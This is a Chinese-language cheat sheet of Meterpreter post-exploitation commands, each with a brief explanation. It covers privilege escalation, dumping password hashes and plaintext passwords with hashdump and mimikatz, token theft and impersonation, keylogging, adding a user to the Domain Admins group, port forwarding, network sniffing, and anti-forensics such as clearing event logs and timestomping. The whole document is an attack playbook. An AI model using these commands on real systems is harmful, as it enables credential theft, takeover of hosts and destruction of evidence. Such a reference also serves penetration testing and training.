[后渗透]获取到 Meterpreter 之后的操作

msf解决中文乱码问题：输入 chcp 65001（UTF-8） chcp 437（IBM437英语）

sysinfo
列出受控主机的系统信息

getuid
查看当前操控身份

ls
列出目标主机的文件和文件夹信息

use priv
加载特权提升扩展模块，来扩展meterpreter库

ps
显示所有运行进程以及关联的用户账户

getsystem
通过各种攻击向量来提升到系统用户权限

shell
以所有可用令牌来运行一个交互的shell

screenshot
对目标主机的屏幕进行截图

upload file
向目标主机上传文件

download file
从目标主机下载文件

keyscan_dump
存储目标主机上或许的键盘记录

getprivs
尽可能多的获取目标主机上的特权

background
将你当前的meterpreter shell转为后台执行

help
打开帮助

run scriptname
运行meterpreter脚本，在scripts/meterpreter目录下可查看到所有脚本名

migrate PID
迁移到一个指定的进程ID

hashdump
导出目标主机中的口令哈希值

load mimikatz
加载mimikatz模块

msv
ssp
tspkg
wdigest
获取登录密码的hash值

kerberos
获取明文密码

mimikatz_command -f samdump::hashes
另一种方式获取哈希值

mimikatz_command -f sekurlsa::searchPasswords
另一种方式获取明文密码

portfwd add -l 3389 -r 192.168.206.200 -p 3389
把被攻击机的3389端口流量，转发到本地的3389端口上

use incognito
加载inconito功能（用来盗取目标主机的令牌或是假冒用户）

list_tokens -u
列出目标主机用户组的可用令牌

impersonate_token DOMAIN_NAME\\USERNAME
假冒目标主机上的可用令牌。

steal_token
盗窃给定进程的可用令牌并进行令牌假冒

drop_token
停止假冒当前的令牌

execute -f cmd.exe -i
执行cmd.exe命令并进行交互。

execute -f cmd.exe -i -t
以所有可用令牌来执行cmd命令。

execute -f cmd.exe -i -H -t
以所有可用令牌来执行cmd命令并隐藏该进程。

add_user username password -h ip
在远程目标主机上添加一个用户

add_group_user “Domain Adimins”username -h ip
将用户添加到目标主机的域管理员组中

clearev
清除目标主机上的日志记录

timestomp
修改文件属性，例如修改文件的创建时间（反取证调差）

reboot
重启目标主机

rev2self
回到控制目标主机的初始用户账户下。

reg command
在目标主机注册表中进行交互，创建，删除和查询等操作。

setdesktop number
切换到另一个用户界面（该功能基于那些用户已登录）。

uietl enable keyboard/mouse
接管目标主机的键盘和鼠标。

use sniffer
加载嗅探模块

sniffer_interfaces
列出目标主机所有开放的网络接口

sniffer_dump interfaceID pcapname
在目标主机上启动嗅探

sniffer_start interfaceID packet_buffer
在目标主机上针对特定范围的数据包缓冲区启动嗅探

sniffer_stats interfaceID
获取正在实施嗅探网络接口的统计数据

sniffer_stop interfaceID
停止嗅探